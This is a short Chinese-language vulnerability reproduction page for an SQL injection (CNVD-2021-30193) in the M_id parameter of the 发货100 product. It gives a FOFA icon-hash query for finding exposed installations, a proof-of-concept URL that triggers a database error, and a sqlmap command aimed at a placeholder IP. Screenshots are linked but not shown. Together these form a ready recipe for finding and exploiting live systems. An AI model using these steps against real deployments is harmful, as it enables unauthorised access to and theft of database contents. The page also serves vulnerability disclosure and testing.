# 发货100 M\_id SQL注入漏洞 CNVD-2021-30193

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

发货100 M\_id参数存在SQL注入漏洞， 攻击者通过漏洞可以获取数据库敏感信息

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

发货100

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

icon\_hash="1420424513"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

主页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhq-w345lMZhXveSCkH%2F-Mhq1r_WAnaK51LbmXbh%2Fimage.png?alt=media\&token=d00fdb69-e104-4daf-9fb4-1028d6c0bf05)

使用POC

```
/?M_id=1%27&type=product
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhq-w345lMZhXveSCkH%2F-Mhq1ul2dZc2_b2finaJ%2Fimage.png?alt=media\&token=2bdae8ac-2b82-41cb-b7bc-9812c1d33ae2)

数据库出现报错, 使用Sqlmap注入

```
sqlmap -u 'http://xxx.xxx.xxx.xxx/?M_id=11%27&type=product' -p M_id
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhq-w345lMZhXveSCkH%2F-Mhq1xyHOQ8c3yfvBYRC%2Fimage.png?alt=media\&token=8624c0bb-8cfa-4871-89a0-352e79283e60)